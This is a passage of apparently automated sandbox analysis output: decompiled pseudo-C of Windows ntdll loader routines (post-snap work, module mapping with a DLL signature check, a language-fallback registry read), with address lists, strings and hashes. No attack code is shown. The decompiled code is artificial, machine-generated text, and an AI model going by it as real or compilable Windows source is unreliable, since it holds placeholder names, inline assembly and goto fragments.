                                                                      									goto L46;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						_v32 = 0;
                                                                      						_v28 = 0;
                                                                      						_v16 = 0;
                                                                      						_v20 = 0;
                                                                      						_v12 = 0;
                                                                      						__eflags = _t118;
                                                                      						if(_t118 != 0) {
                                                                      							__eflags = _t161;
                                                                      							if(_t161 != 0) {
                                                                      								__eflags =  *(_t118 + 8);
                                                                      								if( *(_t118 + 8) == 0) {
                                                                      									L22:
                                                                      									_t143 = 1;
                                                                      									__eflags = 1;
                                                                      								} else {
                                                                      									_t19 = _t118 + 0x40; // 0x40
                                                                      									_t156 = _t19;
                                                                      									E00A08999(_t19,  &_v16);
                                                                      									__eflags = _v0;
                                                                      									if(_v0 != 0) {
                                                                      										__eflags = _v0 - 1;
                                                                      										if(_v0 != 1) {
                                                                      											goto L22;
                                                                      										} else {
                                                                      											_t128 =  *(_t161 + 0x64);
                                                                      											__eflags =  *(_t161 + 0x64);
                                                                      											if( *(_t161 + 0x64) == 0) {
                                                                      												goto L22;
                                                                      											} else {
                                                                      												E00A08999(_t128,  &_v12);
                                                                      												_t147 = _v12;
                                                                      												_t91 = 0;
                                                                      												__eflags = 0;
                                                                      												_t129 =  *_t147;
                                                                      												while(1) {
                                                                      													__eflags =  *((intOrPtr*)(0xae5c60 + _t91 * 8)) - _t129;
                                                                      													if( *((intOrPtr*)(0xae5c60 + _t91 * 8)) == _t129) {
                                                                      														break;
                                                                      													}
                                                                      													_t91 = _t91 + 1;
                                                                      													__eflags = _t91 - 5;
                                                                      													if(_t91 < 5) {
                                                                      														continue;
                                                                      													} else {
                                                                      														_t131 = 0;
                                                                      														__eflags = 0;
                                                                      													}
                                                                      													L37:
                                                                      													__eflags = _t131;
                                                                      													if(_t131 != 0) {
                                                                      														goto L22;
                                                                      													} else {
                                                                      														__eflags = _v16 - _t147;
                                                                      														if(_v16 != _t147) {
                                                                      															goto L22;
                                                                      														} else {
                                                                      															E00A12280(_t92, 0xae86cc);
                                                                      															_t94 = E00AC9DFB( &_v20);
                                                                      															__eflags = _t94 - 1;
                                                                      															if(_t94 != 1) {
                                                                      															}
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															 *_t118 =  *_t118 + 1;
                                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                                      															_t95 = E00A261A0( &_v32);
                                                                      															__eflags = _t95;
                                                                      															if(_t95 != 0) {
                                                                      																__eflags = _v32 | _v28;
                                                                      																if((_v32 | _v28) != 0) {
                                                                      																	_t71 = _t118 + 0x40; // 0x3f
                                                                      																	_t134 = _t71;
                                                                      																	goto L55;
                                                                      																}
                                                                      															}
                                                                      															goto L30;
                                                                      														}
                                                                      													}
                                                                      													goto L56;
                                                                      												}
                                                                      												_t92 = 0xae5c64 + _t91 * 8;
                                                                      												asm("lock xadd [eax], ecx");
                                                                      												_t131 = (_t129 | 0xffffffff) - 1;
                                                                      												goto L37;
                                                                      											}
                                                                      										}
                                                                      										goto L56;
                                                                      									} else {
                                                                      										_t143 = E00A08A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                                      										__eflags = _t143;
                                                                      										if(_t143 != 0) {
                                                                      											_t157 = _v12;
                                                                      											_t103 = 0;
                                                                      											__eflags = 0;
                                                                      											_t136 =  &(_t157[1]);
                                                                      											 *(_t161 + 0x64) = _t136;
                                                                      											_t151 =  *_t157;
                                                                      											_v20 = _t136;
                                                                      											while(1) {
                                                                      												__eflags =  *((intOrPtr*)(0xae5c60 + _t103 * 8)) - _t151;
                                                                      												if( *((intOrPtr*)(0xae5c60 + _t103 * 8)) == _t151) {
                                                                      													break;
                                                                      												}
                                                                      												_t103 = _t103 + 1;
                                                                      												__eflags = _t103 - 5;
                                                                      												if(_t103 < 5) {
                                                                      													continue;
                                                                      												}
                                                                      												L21:
                                                                      												_t105 = E00A3F380(_t136, 0x9d1184, 0x10);
                                                                      												__eflags = _t105;
                                                                      												if(_t105 != 0) {
                                                                      													__eflags =  *_t157 -  *_v16;
                                                                      													if( *_t157 >=  *_v16) {
                                                                      														goto L22;
                                                                      													} else {
                                                                      														asm("cdq");
                                                                      														_t166 = _t157[5] & 0x0000ffff;
                                                                      														_t108 = _t157[5] & 0x0000ffff;
                                                                      														asm("cdq");
                                                                      														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                                      														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                                      														if(__eflags > 0) {
                                                                      															L29:
                                                                      															E00A12280(_t108, 0xae86cc);
                                                                      															 *_t118 =  *_t118 + 1;
                                                                      															_t42 = _t118 + 0x40; // 0x3f
                                                                      															_t156 = _t42;
                                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															asm("movsd");
                                                                      															_t110 = E00A261A0( &_v32);
                                                                      															__eflags = _t110;
                                                                      															if(_t110 != 0) {
                                                                      																__eflags = _v32 | _v28;
                                                                      																if((_v32 | _v28) != 0) {
                                                                      																	_t134 = _v20;
                                                                      																	L55:
                                                                      																	E00AC9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                                      																}
                                                                      															}
                                                                      															L30:
                                                                      															 *_t118 =  *_t118 + 1;
                                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                                      															E00A0FFB0(_t118, _t156, 0xae86cc);
                                                                      															goto L22;
                                                                      														} else {
                                                                      															if(__eflags < 0) {
                                                                      																goto L22;
                                                                      															} else {
                                                                      																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                                      																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                                      																	goto L22;
                                                                      																} else {
                                                                      																	goto L29;
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      													goto L56;
                                                                      												}
                                                                      												goto L22;
                                                                      											}
                                                                      											asm("lock inc dword [eax]");
                                                                      											goto L21;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						return _t143;
                                                                      					}
                                                                      				} else {
                                                                      					_push( &_v8);
                                                                      					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                                      					_push(__ecx + 0x40);
                                                                      					_push(_t121);
                                                                      					_push(0xffffffff);
                                                                      					_t80 = E00A39A00();
                                                                      					_t159 = _t80;
                                                                      					if(_t159 < 0) {
                                                                      						L8:
                                                                      						return _t80;
                                                                      					} else {
                                                                      						goto L2;
                                                                      					}
                                                                      				}
                                                                      				L56:
                                                                      			}












































                                                                      0x00a08799
                                                                      0x00a0879d
                                                                      0x00a087a1
                                                                      0x00a087a3
                                                                      0x00a087a8
                                                                      0x00a087c3
                                                                      0x00a087c3
                                                                      0x00a087c8
                                                                      0x00a087d1
                                                                      0x00a087d4
                                                                      0x00a087d8
                                                                      0x00a087e5
                                                                      0x00a087ec
                                                                      0x00a59bfe
                                                                      0x00a59c00
                                                                      0x00a59c02
                                                                      0x00a59c08
                                                                      0x00a59c0d
                                                                      0x00a59c0f
                                                                      0x00a59c14
                                                                      0x00a59c2d
                                                                      0x00a59c32
                                                                      0x00a59c37
                                                                      0x00a59c3a
                                                                      0x00a59c3c
                                                                      0x00a59c42
                                                                      0x00a59c42
                                                                      0x00a59c3c
                                                                      0x00a59c02
                                                                      0x00a087da
                                                                      0x00a087df
                                                                      0x00a087e3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a087e3
                                                                      0x00a087f2
                                                                      0x00000000
                                                                      0x00a087fb
                                                                      0x00a087fd
                                                                      0x00a087fe
                                                                      0x00a0880e
                                                                      0x00a0880f
                                                                      0x00a08810
                                                                      0x00a08814
                                                                      0x00a0881a
                                                                      0x00a0881c
                                                                      0x00a0881f
                                                                      0x00a08821
                                                                      0x00a08822
                                                                      0x00a08824
                                                                      0x00a08826
                                                                      0x00a0882c
                                                                      0x00a0882e
                                                                      0x00a59c48
                                                                      0x00a59c48
                                                                      0x00a08834
                                                                      0x00a08834
                                                                      0x00a08837
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a08837
                                                                      0x00a0882e
                                                                      0x00a0883d
                                                                      0x00a08840
                                                                      0x00a08843
                                                                      0x00a08846
                                                                      0x00a08849
                                                                      0x00a0884c
                                                                      0x00a0884e
                                                                      0x00a08850
                                                                      0x00a08852
                                                                      0x00a08854
                                                                      0x00a08857
                                                                      0x00a088b4
                                                                      0x00a088b6
                                                                      0x00a088b6
                                                                      0x00a08859
                                                                      0x00a08859
                                                                      0x00a08859
                                                                      0x00a08861
                                                                      0x00a08866
                                                                      0x00a0886a
                                                                      0x00a0893d
                                                                      0x00a08941
                                                                      0x00000000
                                                                      0x00a08947
                                                                      0x00a08947
                                                                      0x00a0894a
                                                                      0x00a0894c
                                                                      0x00000000
                                                                      0x00a08952
                                                                      0x00a08955
                                                                      0x00a0895a
                                                                      0x00a0895d
                                                                      0x00a0895d
                                                                      0x00a0895f
                                                                      0x00a08961
                                                                      0x00a08961
                                                                      0x00a08968
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a0896a
                                                                      0x00a0896b
                                                                      0x00a0896e
                                                                      0x00000000
                                                                      0x00a08970
                                                                      0x00a08970
                                                                      0x00a08970
                                                                      0x00a08970
                                                                      0x00a08972
                                                                      0x00a08972
                                                                      0x00a08974
                                                                      0x00000000
                                                                      0x00a0897a
                                                                      0x00a0897a
                                                                      0x00a0897d
                                                                      0x00000000
                                                                      0x00a08983
                                                                      0x00a59c65
                                                                      0x00a59c6d
                                                                      0x00a59c72
                                                                      0x00a59c75
                                                                      0x00a59c75
                                                                      0x00a59c82
                                                                      0x00a59c86
                                                                      0x00a59c87
                                                                      0x00a59c88
                                                                      0x00a59c89
                                                                      0x00a59c8c
                                                                      0x00a59c90
                                                                      0x00a59c95
                                                                      0x00a59c97
                                                                      0x00a59ca0
                                                                      0x00a59ca3
                                                                      0x00a59ca9
                                                                      0x00a59ca9
                                                                      0x00000000
                                                                      0x00a59ca9
                                                                      0x00a59ca3
                                                                      0x00000000
                                                                      0x00a59c97
                                                                      0x00a0897d
                                                                      0x00000000
                                                                      0x00a08974
                                                                      0x00a08988
                                                                      0x00a08992
                                                                      0x00a08996
                                                                      0x00000000
                                                                      0x00a08996
                                                                      0x00a0894c
                                                                      0x00000000
                                                                      0x00a08870
                                                                      0x00a0887b
                                                                      0x00a0887d
                                                                      0x00a0887f
                                                                      0x00a08881
                                                                      0x00a08884
                                                                      0x00a08884
                                                                      0x00a08886
                                                                      0x00a08889
                                                                      0x00a0888c
                                                                      0x00a0888e
                                                                      0x00a08891
                                                                      0x00a08891
                                                                      0x00a08898
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a0889a
                                                                      0x00a0889b
                                                                      0x00a0889e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a088a0
                                                                      0x00a088a8
                                                                      0x00a088b0
                                                                      0x00a088b2
                                                                      0x00a088d3
                                                                      0x00a088d5
                                                                      0x00000000
                                                                      0x00a088d7
                                                                      0x00a088db
                                                                      0x00a088dc
                                                                      0x00a088e0
                                                                      0x00a088e8
                                                                      0x00a088ee
                                                                      0x00a088f0
                                                                      0x00a088f3
                                                                      0x00a088fc
                                                                      0x00a08901
                                                                      0x00a08906
                                                                      0x00a0890c
                                                                      0x00a0890c
                                                                      0x00a0890f
                                                                      0x00a08916
                                                                      0x00a08917
                                                                      0x00a08918
                                                                      0x00a08919
                                                                      0x00a0891a
                                                                      0x00a0891f
                                                                      0x00a08921
                                                                      0x00a59c52
                                                                      0x00a59c55
                                                                      0x00a59c5b
                                                                      0x00a59cac
                                                                      0x00a59cc0
                                                                      0x00a59cc0
                                                                      0x00a59c55
                                                                      0x00a08927
                                                                      0x00a08927
                                                                      0x00a0892f
                                                                      0x00a08933
                                                                      0x00000000
                                                                      0x00a088f5
                                                                      0x00a088f5
                                                                      0x00000000
                                                                      0x00a088f7
                                                                      0x00a088f7
                                                                      0x00a088fa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a088fa
                                                                      0x00a088f5
                                                                      0x00a088f3
                                                                      0x00000000
                                                                      0x00a088d5
                                                                      0x00000000
                                                                      0x00a088b2
                                                                      0x00a088c9
                                                                      0x00000000
                                                                      0x00a088c9
                                                                      0x00a0887f
                                                                      0x00a0886a
                                                                      0x00a08857
                                                                      0x00a08852
                                                                      0x00a088bf
                                                                      0x00a088bf
                                                                      0x00a087aa
                                                                      0x00a087ad
                                                                      0x00a087ae
                                                                      0x00a087b4
                                                                      0x00a087b5
                                                                      0x00a087b6
                                                                      0x00a087b8
                                                                      0x00a087bd
                                                                      0x00a087c1
                                                                      0x00a087f4
                                                                      0x00a087fa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a087c1
                                                                      0x00000000

                                                                      Strings
                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 00A59C28
                                                                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00A59C18
                                                                      • LdrpDoPostSnapWork, xrefs: 00A59C1E
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                      • API String ID: 2994545307-1948996284
                                                                      • Opcode ID: 05578aedbaf8c5c70d1d14ae4ef6d4739cfb01bd89b8a604322cb5483dca28bd
                                                                      • Instruction ID: ca451e24045bff894118f31a6966d69de4d0e5b30275382cd71a443505b0f6a6
                                                                      • Opcode Fuzzy Hash: 05578aedbaf8c5c70d1d14ae4ef6d4739cfb01bd89b8a604322cb5483dca28bd
                                                                      • Instruction Fuzzy Hash: 8F911631A0021EDFDF18DF59E881ABA73B5FF44354B548069E885AB292DF34ED05CB98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 98%
                                                                      			E00A07E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                      				char _v8;
                                                                      				intOrPtr _v12;
                                                                      				intOrPtr _v16;
                                                                      				intOrPtr _v20;
                                                                      				char _v24;
                                                                      				signed int _t73;
                                                                      				void* _t77;
                                                                      				char* _t82;
                                                                      				char* _t87;
                                                                      				signed char* _t97;
                                                                      				signed char _t102;
                                                                      				intOrPtr _t107;
                                                                      				signed char* _t108;
                                                                      				intOrPtr _t112;
                                                                      				intOrPtr _t124;
                                                                      				intOrPtr _t125;
                                                                      				intOrPtr _t126;
                                                                      
                                                                      				_t107 = __edx;
                                                                      				_v12 = __ecx;
                                                                      				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                                      				_t124 = 0;
                                                                      				_v20 = __edx;
                                                                      				if(E00A0CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                                      					_t112 = _v8;
                                                                      				} else {
                                                                      					_t112 = 0;
                                                                      					_v8 = 0;
                                                                      				}
                                                                      				if(_t112 != 0) {
                                                                      					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                                      						_t124 = 0xc000007b;
                                                                      						goto L8;
                                                                      					}
                                                                      					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                                      					 *(_t125 + 0x34) = _t73;
                                                                      					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                                      						goto L3;
                                                                      					}
                                                                      					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                                      					_t124 = E009FC9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                                      					if(_t124 < 0) {
                                                                      						goto L8;
                                                                      					} else {
                                                                      						goto L3;
                                                                      					}
                                                                      				} else {
                                                                      					L3:
                                                                      					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                                      						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                                      						L8:
                                                                      						return _t124;
                                                                      					}
                                                                      					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                                      						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                                      							goto L5;
                                                                      						}
                                                                      						_t102 =  *0xae5780; // 0x0
                                                                      						if((_t102 & 0x00000003) != 0) {
                                                                      							E00A75510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                                      							_t102 =  *0xae5780; // 0x0
                                                                      						}
                                                                      						if((_t102 & 0x00000010) != 0) {
                                                                      							asm("int3");
                                                                      						}
                                                                      						_t124 = 0xc0000428;
                                                                      						goto L8;
                                                                      					}
                                                                      					L5:
                                                                      					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                                      						goto L8;
                                                                      					}
                                                                      					_t77 = _a4 - 0x40000003;
                                                                      					if(_t77 == 0 || _t77 == 0x33) {
                                                                      						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                                      						if(E00A17D50() != 0) {
                                                                      							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                      						} else {
                                                                      							_t82 = 0x7ffe0384;
                                                                      						}
                                                                      						_t108 = 0x7ffe0385;
                                                                      						if( *_t82 != 0) {
                                                                      							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                      								if(E00A17D50() == 0) {
                                                                      									_t97 = 0x7ffe0385;
                                                                      								} else {
                                                                      									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                      								}
                                                                      								if(( *_t97 & 0x00000020) != 0) {
                                                                      									E00A77016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						if(_a4 != 0x40000003) {
                                                                      							L14:
                                                                      							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                                      							if(E00A17D50() != 0) {
                                                                      								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                      							} else {
                                                                      								_t87 = 0x7ffe0384;
                                                                      							}
                                                                      							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                      								if(E00A17D50() != 0) {
                                                                      									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                      								}
                                                                      								if(( *_t108 & 0x00000020) != 0) {
                                                                      									E00A77016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                                      								}
                                                                      							}
                                                                      							goto L8;
                                                                      						} else {
                                                                      							_v16 = _t125 + 0x24;
                                                                      							_t124 = E00A2A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                                      							if(_t124 < 0) {
                                                                      								E009FB1E1(_t124, 0x1490, 0, _v16);
                                                                      								goto L8;
                                                                      							}
                                                                      							goto L14;
                                                                      						}
                                                                      					} else {
                                                                      						goto L8;
                                                                      					}
                                                                      				}
                                                                      			}




















                                                                      0x00a07e4c
                                                                      0x00a07e50
                                                                      0x00a07e55
                                                                      0x00a07e58
                                                                      0x00a07e5d
                                                                      0x00a07e71
                                                                      0x00a07f33
                                                                      0x00a07e77
                                                                      0x00a07e77
                                                                      0x00a07e79
                                                                      0x00a07e79
                                                                      0x00a07e7e
                                                                      0x00a07f45
                                                                      0x00a59848
                                                                      0x00000000
                                                                      0x00a59848
                                                                      0x00a07f4e
                                                                      0x00a07f53
                                                                      0x00a07f5a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a5985a
                                                                      0x00a59862
                                                                      0x00a59866
                                                                      0x00000000
                                                                      0x00a5986c
                                                                      0x00000000
                                                                      0x00a5986c
                                                                      0x00a07e84
                                                                      0x00a07e84
                                                                      0x00a07e8d
                                                                      0x00a59871
                                                                      0x00a07eb8
                                                                      0x00a07ec0
                                                                      0x00a07ec0
                                                                      0x00a07e9a
                                                                      0x00a5987e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a59884
                                                                      0x00a5988b
                                                                      0x00a598a7
                                                                      0x00a598ac
                                                                      0x00a598b1
                                                                      0x00a598b6
                                                                      0x00a598b8
                                                                      0x00a598b8
                                                                      0x00a598b9
                                                                      0x00000000
                                                                      0x00a598b9
                                                                      0x00a07ea0
                                                                      0x00a07ea7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a07eac
                                                                      0x00a07eb1
                                                                      0x00a07ec6
                                                                      0x00a07ed0
                                                                      0x00a598cc
                                                                      0x00a07ed6
                                                                      0x00a07ed6
                                                                      0x00a07ed6
                                                                      0x00a07ede
                                                                      0x00a07ee3
                                                                      0x00a598e3
                                                                      0x00a598f0
                                                                      0x00a59902
                                                                      0x00a598f2
                                                                      0x00a598fb
                                                                      0x00a598fb
                                                                      0x00a59907
                                                                      0x00a5991d
                                                                      0x00a5991d
                                                                      0x00a59907
                                                                      0x00a598e3
                                                                      0x00a07ef0
                                                                      0x00a07f14
                                                                      0x00a07f14
                                                                      0x00a07f1e
                                                                      0x00a59946
                                                                      0x00a07f24
                                                                      0x00a07f24
                                                                      0x00a07f24
                                                                      0x00a07f2c
                                                                      0x00a5996a
                                                                      0x00a59975
                                                                      0x00a59975
                                                                      0x00a5997e
                                                                      0x00a59993
                                                                      0x00a59993
                                                                      0x00a5997e
                                                                      0x00000000
                                                                      0x00a07ef2
                                                                      0x00a07efc
                                                                      0x00a07f0a
                                                                      0x00a07f0e
                                                                      0x00a59933
                                                                      0x00000000
                                                                      0x00a59933
                                                                      0x00000000
                                                                      0x00a07f0e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a07eb1

                                                                      Strings
                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 00A598A2
                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 00A59891
                                                                      • LdrpCompleteMapModule, xrefs: 00A59898
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                      • API String ID: 0-1676968949
                                                                      • Opcode ID: 8e549fec6a99eb2d9d12bb8ae571c93db5d1d2e053a5ad76b6b19b961a797872
                                                                      • Instruction ID: 9c02a753a0232006e7e60becf61cf500f219b40e2764d8e4dfecfb98c78429fb
                                                                      • Opcode Fuzzy Hash: 8e549fec6a99eb2d9d12bb8ae571c93db5d1d2e053a5ad76b6b19b961a797872
                                                                      • Instruction Fuzzy Hash: C951DE31A09749DBDB21CB68D944B6EB7B4BF41314F1406A9E8519B3E2D770FD00CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E009FE620(void* __ecx, short* __edx, short* _a4) {
                                                                      				char _v16;
                                                                      				char _v20;
                                                                      				intOrPtr _v24;
                                                                      				char* _v28;
                                                                      				char _v32;
                                                                      				char _v36;
                                                                      				char _v44;
                                                                      				signed int _v48;
                                                                      				intOrPtr _v52;
                                                                      				void* _v56;
                                                                      				void* _v60;
                                                                      				char _v64;
                                                                      				void* _v68;
                                                                      				void* _v76;
                                                                      				void* _v84;
                                                                      				signed int _t59;
                                                                      				signed int _t74;
                                                                      				signed short* _t75;
                                                                      				signed int _t76;
                                                                      				signed short* _t78;
                                                                      				signed int _t83;
                                                                      				short* _t93;
                                                                      				signed short* _t94;
                                                                      				short* _t96;
                                                                      				void* _t97;
                                                                      				signed int _t99;
                                                                      				void* _t101;
                                                                      				void* _t102;
                                                                      
                                                                      				_t80 = __ecx;
                                                                      				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                                      				_t96 = __edx;
                                                                      				_v44 = __edx;
                                                                      				_t78 = 0;
                                                                      				_v56 = 0;
                                                                      				if(__ecx == 0 || __edx == 0) {
                                                                      					L28:
                                                                      					_t97 = 0xc000000d;
                                                                      				} else {
                                                                      					_t93 = _a4;
                                                                      					if(_t93 == 0) {
                                                                      						goto L28;
                                                                      					}
                                                                      					_t78 = E009FF358(__ecx, 0xac);
                                                                      					if(_t78 == 0) {
                                                                      						_t97 = 0xc0000017;
                                                                      						L6:
                                                                      						if(_v56 != 0) {
                                                                      							_push(_v56);
                                                                      							E00A395D0();
                                                                      						}
                                                                      						if(_t78 != 0) {
                                                                      							L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                                      						}
                                                                      						return _t97;
                                                                      					}
                                                                      					E00A3FA60(_t78, 0, 0x158);
                                                                      					_v48 = _v48 & 0x00000000;
                                                                      					_t102 = _t101 + 0xc;
                                                                      					 *_t96 = 0;
                                                                      					 *_t93 = 0;
                                                                      					E00A3BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                                      					_v36 = 0x18;
                                                                      					_v28 =  &_v44;
                                                                      					_v64 = 0;
                                                                      					_push( &_v36);
                                                                      					_push(0x20019);
                                                                      					_v32 = 0;
                                                                      					_push( &_v64);
                                                                      					_v24 = 0x40;
                                                                      					_v20 = 0;
                                                                      					_v16 = 0;
                                                                      					_t97 = E00A39600();
                                                                      					if(_t97 < 0) {
                                                                      						goto L6;
                                                                      					}
                                                                      					E00A3BB40(0,  &_v36, L"InstallLanguageFallback");
                                                                      					_push(0);
                                                                      					_v48 = 4;
                                                                      					_t97 = L009FF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                                      					if(_t97 >= 0) {
                                                                      						if(_v52 != 1) {
                                                                      							L17:
                                                                      							_t97 = 0xc0000001;
                                                                      							goto L6;
                                                                      						}
                                                                      						_t59 =  *_t78 & 0x0000ffff;
                                                                      						_t94 = _t78;
                                                                      						_t83 = _t59;
                                                                      						if(_t59 == 0) {
                                                                      							L19:
                                                                      							if(_t83 == 0) {
                                                                      								L23:
                                                                      								E00A3BB40(_t83, _t102 + 0x24, _t78);
                                                                      								if(L00A043C0( &_v48,  &_v64) == 0) {
                                                                      									goto L17;
                                                                      								}
                                                                      								_t84 = _v48;
                                                                      								 *_v48 = _v56;
                                                                      								if( *_t94 != 0) {
                                                                      									E00A3BB40(_t84, _t102 + 0x24, _t94);
                                                                      									if(L00A043C0( &_v48,  &_v64) != 0) {
                                                                      										 *_a4 = _v56;
                                                                      									} else {
                                                                      										_t97 = 0xc0000001;
                                                                      										 *_v48 = 0;
                                                                      									}
                                                                      								}
                                                                      								goto L6;
                                                                      							}
                                                                      							_t83 = _t83 & 0x0000ffff;
                                                                      							while(_t83 == 0x20) {
                                                                      								_t94 =  &(_t94[1]);
                                                                      								_t74 =  *_t94 & 0x0000ffff;
                                                                      								_t83 = _t74;
                                                                      								if(_t74 != 0) {
                                                                      									continue;
                                                                      								}
                                                                      								goto L23;
                                                                      							}
                                                                      							goto L23;
                                                                      						} else {
                                                                      							goto L14;
                                                                      						}
                                                                      						while(1) {
                                                                      							L14:
                                                                      							_t27 =  &(_t94[1]); // 0x2
                                                                      							_t75 = _t27;
                                                                      							if(_t83 == 0x2c) {
                                                                      								break;
                                                                      							}
                                                                      							_t94 = _t75;
                                                                      							_t76 =  *_t94 & 0x0000ffff;
                                                                      							_t83 = _t76;
                                                                      							if(_t76 != 0) {
                                                                      								continue;
                                                                      							}
                                                                      							goto L23;
                                                                      						}
                                                                      						 *_t94 = 0;
                                                                      						_t94 = _t75;
                                                                      						_t83 =  *_t75 & 0x0000ffff;
                                                                      						goto L19;
                                                                      					}
                                                                      				}
                                                                      			}































                                                                      0x009fe620
                                                                      0x009fe628
                                                                      0x009fe62f
                                                                      0x009fe631
                                                                      0x009fe635
                                                                      0x009fe637
                                                                      0x009fe63e
                                                                      0x00a55503
                                                                      0x00a55503
                                                                      0x009fe64c
                                                                      0x009fe64c
                                                                      0x009fe651
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x009fe661
                                                                      0x009fe665
                                                                      0x00a5542a
                                                                      0x009fe715
                                                                      0x009fe71a
                                                                      0x009fe71c
                                                                      0x009fe720
                                                                      0x009fe720
                                                                      0x009fe727
                                                                      0x009fe736
                                                                      0x009fe736
                                                                      0x009fe743
                                                                      0x009fe743
                                                                      0x009fe673
                                                                      0x009fe678
                                                                      0x009fe67d
                                                                      0x009fe682
                                                                      0x009fe685
                                                                      0x009fe692
                                                                      0x009fe69b
                                                                      0x009fe6a3
                                                                      0x009fe6ad
                                                                      0x009fe6b1
                                                                      0x009fe6b2
                                                                      0x009fe6bb
                                                                      0x009fe6bf
                                                                      0x009fe6c0
                                                                      0x009fe6c8
                                                                      0x009fe6cc
                                                                      0x009fe6d5
                                                                      0x009fe6d9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x009fe6e5
                                                                      0x009fe6ea
                                                                      0x009fe6f9
                                                                      0x009fe70b
                                                                      0x009fe70f
                                                                      0x00a55439
                                                                      0x00a5545e
                                                                      0x00a5545e
                                                                      0x00000000
                                                                      0x00a5545e
                                                                      0x00a5543b
                                                                      0x00a5543e
                                                                      0x00a55440
                                                                      0x00a55445
                                                                      0x00a55472
                                                                      0x00a55475
                                                                      0x00a5548d
                                                                      0x00a55493
                                                                      0x00a554a9
                                                                      0x00000000
